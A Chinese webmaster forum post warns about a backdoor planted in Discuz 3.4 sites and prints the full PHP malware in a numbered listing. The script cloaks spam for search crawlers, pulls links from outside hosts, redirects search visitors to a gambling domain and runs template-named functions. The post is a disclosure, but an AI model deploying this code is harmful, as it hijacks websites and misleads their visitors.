承接
网站维护 网站升级 数据转换 页面美化 插件二开 BUG修复
热门
插件 板摸 教程 分享 攻略 经验 电脑 服务器
分类
数据转换 网站升级 故障排查 BUG修复 页面美化 插件升级
草根吧»论坛首页 站长交流专区 站长头条 Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑 ...
返回列表 发新帖
查看: 2745|回复: 0

Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链注入脚本

[复制链接]
民审-M

1万

热度

1万

元宝

1万

贡献

金牌草根
发表于 2018-2-7 11:13:31 | 显示全部楼层 |阅读模式
本帖最后由 民审-M 于 2018-2-7 11:15 编辑

Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:

引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
阿里云监控.jpg


案列黑链注入代码:
  1. <?php
  2. ini_set('html_errors',false);
  3. ini_set('display_errors',false);
  4. define("APP_INCLUDE_FLAG","TRUE");
  5. define('APP_JACK_CHARSET','GBK');
  6. header("Content-type: text/html; charset=".APP_JACK_CHARSET);
  7. define('APP_JACK_DOCUMENTROOT','/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/');
  8. define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt');
  9. $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
  10. if (stristr($userAgent,"sogou")){
  11.         define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
  12.         define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
  13.         define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
  14. }
  15. else
  16. {
  17.         define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
  18.         define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
  19.         define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
  20. }
  21. define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'wen.txt');
  22. define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'miaoshu.txt');
  23. define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'bianliang2.txt');
  24. define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'bianliang3.txt');
  25. define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hunhe.txt');
  26. define('APP_JACK_CACHED','Uncached');
  27. define('APP_JACK_MIN_PAR','3');
  28. define('APP_JACK_MAX_PAR','3');
  29. define('APP_JACK_MIN','10');        
  30. define('APP_JACK_MAX','15');
  31. define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'app.txt');

  33. function App_GetLink(){
  34.         return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
  35. }
  36. function App_GetSelf(){
  37.         return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
  38. }
  39. //返回图片
  40. function getImg(){
  41.         return 'http://link.wlbxsjs.com/tupian/'.rand(1,7000).".jpg";
  42. }
  43. $my_app = new missclient();
  44. $my_app->run();

  46. class missclient{
  47.         
  48.         public $show_spider;
  49.         public $jump_ref;
  50.         public $http_ref_filter;
  51.         public $jump_url = "";
  52.         public $domain = "";
  53.         public $condition = "";
  54.         public $app_server = "";
  55.         public $log_spider = "";
  56.         public $cur_spider = "";
  57.         public $allow_ip = "";
  58.         public $isCache = false;

  60.         public function run(){
  61.                 $this->domain = $this->getServerName();
  62.                 $this->jump_ref = explode("|","360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso");
  63.                 $this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A");
  64.                 $this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
  65.                 $this->condition = ($_GET['tid']> 9999999 && $this->isAllowdIp());
  66.                 $this->app_server = "http://www.sohu999.com/gbk/app.php";
  67.                 $this->isCache  = False;
  68.                 if($this->isSpider() && $this->isAllowdIp()){
  69.                                 if($this->condition){
  70.                                         if($this->isCache){
  71.                                                 $relset_host = $this->getServerName();
  72.                                                 $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
  73.                                                 $cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
  74.                                                 if(!@file_exists($dir)){
  75.                                               mkdir($dir, 0777);
  76.                                     }
  77.                                                 if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
  78.                                                         $var = coreAppCache::read($cacheFile);
  79.                                                         $page = file_get_contents(APP_JACK_TEMPLATE);
  80.                                                         foreach($var as $key=>$v){
  81.                                                                 $flag = "{".$key."}";
  82.                                                                 $page = str_replace($flag,$v,$page);
  83.                                                         }
  84.                                                         echo myReplace($page);
  85.                                                         exit();
  86.                                                 }
  87.                                                 else
  88.                                                 {        
  89.                                                         //包含进APP即可
  90.                                                         $currentPage = include(APP_JACK_APPFILE);
  91.                                                 if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
  92.                                                                 $var = self::cut($currentPage,"<explode>","</explode>");
  93.                                                                 $var = coreAppCache::decode($var);
  94.                                                                 $page = file_get_contents(APP_JACK_TEMPLATE);
  95.                                                                 foreach($var as $key=>$v){
  96.                                                                         $flag = "{".$key."}";
  97.                                                                         $page = str_replace($flag,$v,$page);
  98.                                                                 }
  99.                                 echo myReplace($page);
  100.                                                                 @coreAppCache::writenocode($currentPage,$cacheFile);
  101.                                                         }
  102.                                                 }
  103.                                                 die();
  104.                                         }
  105.                                         else
  106.                                         {
  107.                                                 $currentPage = include(APP_JACK_APPFILE);
  108.                                                 echo myReplace($currentPage);
  109.                                                 die();
  110.                                         }
  111.                                 }
  112.                                 else
  113.                                 {

  115.                                         $this->_uncondition_hook();
  116.                                 }
  117.                 }
  118.                 else
  119.                 {        
  120.                         if($this->isRef() && $this->condition){
  121.                                 $this->Jump();
  122.                         }
  123.                         else
  124.                         {
  125.                                 $this->_unSpider_hook();
  126.                         }
  127.                 }
  128.         }

  130.         public function isAllowdIp(){
  131.                 $ip = $this->clientIp();
  132.                 $non_list = explode("|",$this->allow_ip);
  133.                 foreach($non_list as $iplist){
  134.                         if(@stristr($ip,$iplist)){
  135.                                 return false;
  136.                         }
  137.                 }
  138.                 return true;
  139.         }

  141.         public function clientIp(){
  142.                 if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
  143.                         $onlineip = getenv('HTTP_CLIENT_IP');
  144.                 } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
  145.                         $onlineip = getenv('HTTP_X_FORWARDED_FOR');
  146.                 } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
  147.                         $onlineip = getenv('REMOTE_ADDR');
  148.                 } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
  149.                         $onlineip = $_SERVER['REMOTE_ADDR'];
  150.                 }
  151.                 preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
  152.                 $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
  153.                 unset($onlineipmatches);
  154.                 return $onlineip;
  155.         }

  157.         public function isSpider(){
  158.                 $bots = array(
  159.                                                 'Google'        => 'Googlebot',
  160.                                                 'MSN'        => 'MSNbot',
  161.                                                 'Soso'        => 'Sosospider',
  162.                                                 'Youdao'        => 'Youdaobot',
  163.                                                 'Yodao'        => 'Yodaobot',
  164.                                                 'Yisou'        => 'Yisouspider',
  165.                                                 'Easou'        => 'Easouspider',
  166.                                                 'Etao'        => 'Etaospider',
  167.                                                 'Chinaso'        => 'Chinasospider',
  168.                                                 'Baidu'        => 'Baiduspider',
  169.                                                 'Sogou'        => 'Sogou news Spider',
  170.                                                 'Sogou'        => 'Sogou orion spider',
  171.                                                 'Sogou'        => 'Sogou news Spider',
  172.                                                 'Sogou'        => 'Sogou blog',
  173.                                                 'Sogou'        => 'Sogou spider2',
  174.                                                 'Sogou'        => 'Sogou inst spider',
  175.                                                 'Sogou'        => 'Sogou web spider',
  176.                                                 'Haoso'        => 'haosouspider',
  177.                                                 '360spider'        => '360spider',
  178.                                                 'bingbot'        => 'bingbot'
  179.                  );
  180.                 $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
  181.                 foreach ($bots as $k => $v){
  182.                         if (stristr($userAgent,$v)){
  183.                                 if(!empty($this->log_spider)){
  184.                                         @file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
  185.                                 }
  186.                                 $this->cur_spider = $k;
  187.                                 return true;
  188.                                 break;
  189.                         }
  190.                 }
  191.                 return false;        
  192.         }

  194.         public function isRef(){
  195.                 $ref = strtolower(@$_SERVER['HTTP_REFERER']);
  196.                 if(isset($_COOKIE["domain-filter-bypass"])){
  197.                         return false;
  198.                 }
  199.                
  200.                 if(!$this->isAllowdIp()){
  201.                         setcookie("domain-filter-bypass", "lol", time() + 259200);
  202.                         return false;
  203.                 }

  205.                 foreach($this->http_ref_filter as $r){
  206.                         $r = trim($r);
  207.                         if(stristr($ref,$r)){
  208.                                 setcookie("domain-filter-bypass", "lol", time() + 259200);
  209.                                 return false;
  210.                         }
  211.                 }
  212.         
  213.                 foreach($this->jump_ref as $r){
  214.                         $r = trim($r);
  215.                         if(stristr($ref,$r)){
  216.                                 return true;
  217.                         }
  218.                 }
  219.         }

  221.         public function getServerName()
  222.         {
  223.                 $ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']);
  224.                 if( strpos($ServerName,'http://') )
  225.                 {
  226.                         return str_replace('http://','',$ServerName);
  227.                 }
  228.                 return $ServerName;
  229.         }

  231.         public function getPage(){
  232.                 if($this->isCache){
  233.                         $cache="cached";
  234.                 }
  235.                 $url  = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
  236.                 return $this->HttpVisit($url);
  237.         }

  239.     public function HttpVisit($weburl) {
  240.         $remote_data = NULL;
  241.         if (function_exists('curl_exec')) {
  242.             $curl = @curl_init();
  243.             @curl_setopt($curl, CURLOPT_URL, $weburl);
  244.             @curl_setopt($curl, CURLOPT_HEADER, 0);
  245.             @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
  246.             @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  247.             $remote_data = @curl_exec($curl);
  248.             @curl_close($curl);
  249.         } else {
  250.             if (function_exists('stream_context_create')) {
  251.                 $header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
  252.                 $http_header = @stream_context_create($header_array);
  253.                 $remote_data = @file_get_contents($weburl, false, $http_header);
  254.             } else {
  255.                 $temp_url = explode("/", $weburl);
  256.                 $new_url = $temp_url[2];
  257.                 $http_port = 80;
  258.                 $get_file = substr($weburl, strlen($new_url) + 7);
  259.                 if (strstr($new_url, chr(58))) {
  260.                     $s_var_array['td'] = explode(chr(58), $new_url);
  261.                     $new_url = $s_var_array['td'][0];
  262.                     $http_port = $s_var_array['td'][1];
  263.                 }
  264.                 $fsock_result = @fsockopen($new_url, $http_port);
  265.                 @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
  266.                 while (!feof($fsock_result)) {
  267.                     $remote_data .= fgets($fsock_result, 1024);
  268.                 }
  269.                 @fclose($fsock_result);
  270.             }
  271.         }
  272.         return $remote_data;
  273.     }

  275.         public function Jump(){
  276.                 $ref = strtolower(@$_SERVER['HTTP_REFERER']);
  277.                 if($this->isAllowdIp() && stristr($ref,"sogou.")){
  278.                         $domain  = str_replace(".","_",$this->domain);
  279.                         header('Location: https://958999a.com/?jpb_'.$domain);
  280.                         exit;
  281.                 }
  282.                 $ref = strtolower(@$_SERVER['HTTP_REFERER']);
  283.                 if($this->isAllowdIp() && stristr($ref,"bing.")){
  284.                         $domain  = str_replace(".","_",$this->domain);
  285.                         header('Location: https://958999a.com/?jpb_'.$domain);
  286.                         exit;
  287.                 }
  288.                 if($this->isAllowdIp()){
  289.                         $domain  = str_replace(".","_",$this->domain);
  290.                         header('Location: https://958999a.com/?jpb_'.$domain);
  291.                         exit;
  292.                 }
  293.         }
  294.         
  295.         public function _uncondition_hook(){
  296.                 $array = array();
  297.                 for($a=0;$a<5;$a++){
  298.                         echo '<a href="'.App_GetLink().'"></a>'."\n";
  299.                 }
  300.         }

  302.         public function _unSpider_hook(){
  303.                 //
  304.         }


  307.         public function strStartWith($needle, $haystack){
  308.             return (substr($haystack, 0, strlen($needle))==$needle);
  309.         }

  311.         public function rndStr($length=8){
  312.                 $str = null;
  313.                 $strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
  314.                 $max = strlen($strPol)-1;
  315.                 for($i=0;$i<$length;$i++){
  316.                         $str.=$strPol[rand(0,$max)];
  317.                 }
  318.                 return $str;
  319.         }

  321.         public function cut($file,$from,$end)
  322.         {
  323.                 $message=explode($from,$file);
  324.                 $message=explode($end,$message[1]);
  325.                 return   $message[0];
  326.         }
  327. }

  329. class coreAppCache{
  330.         //写入缓存
  331.         public function write($file,$filename){
  332.                 return file_put_contents($filename,self::encode($file));
  333.         }
  334.         public function writenocode($file,$filename){
  335.                 return file_put_contents($filename,$file);
  336.         }
  337.         public function read($filename){
  338.                 $content = file_get_contents($filename);
  339.                 if(stristr($content,"</explode>")){
  340.                         $content = self::cut($content,"<explode>","</explode>");
  341.                 }
  342.                 return self::decode($content);
  343.         }

  345.         public function encode($file){
  346.                 return base64_encode(gzcompress(serialize($file)));
  347.         }

  349.         public function decode($file){
  350.                 return unserialize(gzuncompress(base64_decode($file)));
  351.         }
  352.         
  353.         public function cut($file,$from,$end)
  354.         {
  355.                 $message=explode($from,$file);
  356.                 $message=explode($end,$message[1]);
  357.                 return   $message[0];
  358.         }
  359. }

  361. function removeBom($str) {
  362.     $str = preg_replace('/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux', '', $str);

  364.     return $str;
  365. }

  367. function replaceMyLink($str) {
  368.     static $myLinks;

  370.     if (is_null($myLinks)) {
  371.         $c = new missclient();
  372.         $contents = removeBom($c->HttpVisit(MY_LINK_URL));
  373.         $contents = array_filter(array_map('trim', explode(PHP_EOL, $contents)));

  375.         $myLinks = $contents;
  376.     }

  378.     $linkIndex = array_rand($myLinks, 1);
  379.     $link = $myLinks[$linkIndex];

  381.     return $link;
  382. }

  384. function myLinkHandler($str) {
  385.     return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str);
  386. }

  388. function myReplace($str) {
  389.     $str = myLinkHandler($str);

  391.     preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER);
  392.     foreach ($arr as $item) {
  393.         if (isset($item[1], $item[2]) && function_exists($item[1])) {
  394.             $a = call_user_func_array($item[1], explode(',', $item[2]));
  395.             $str = str_replace_first($item[0], $a, $str);
  396.         }
  397.     }

  399.     return $str;
  400. }

  402. function str_replace_first($from, $to, $subject)
  403. {
  404.     $from = '@'.preg_quote($from, '/').'@si';

  406.     return preg_replace($from, $to, $subject, 1);
  407. }

  409. function randKey($len, $mLen = null)
  410. {
  411.     $chars = array(
  412.         "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"
  413.     );
  414.     if ($mLen && $mLen > 0) {
  415.         $minLen = min($len, $mLen);
  416.         $maxLen = max($mLen, $len);

  418.         $lenArr = range($minLen, $maxLen);
  419.         $len = $lenArr[array_rand($lenArr)];
  420.     }

  422.     $charsLen = count($chars) - 1;
  423.     shuffle($chars);
  424.     $str = "";
  425.     for ($i=0; $i<$len; $i++)
  426.     {
  427.         $str .= $chars[mt_rand(0, $charsLen)];
  428.     }
  429.     return trim($str);
  430. }
  431. ?>
复制代码


可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
discuz, 漏洞, 利用, 报告, 网站

相关帖子

本文来源于网友学习研究交流 www.caogen8.co,请以学习研究交流为主。
如果您没有贡献积分,可以直接免费领取,免费领取
如果你需要加入本学习研究交流,请以学习研究交流为目的,免责声明
如果找不到您要的资源,请搜索一下,点击搜索
回复 <

举报

返回列表 发新帖
 懒得打字嘛,点击右侧快捷回复【最新发布】   【赞助草根吧享更多权益】
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

收藏帖子 返回列表 搜索

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

小黑屋|手机版|草根吧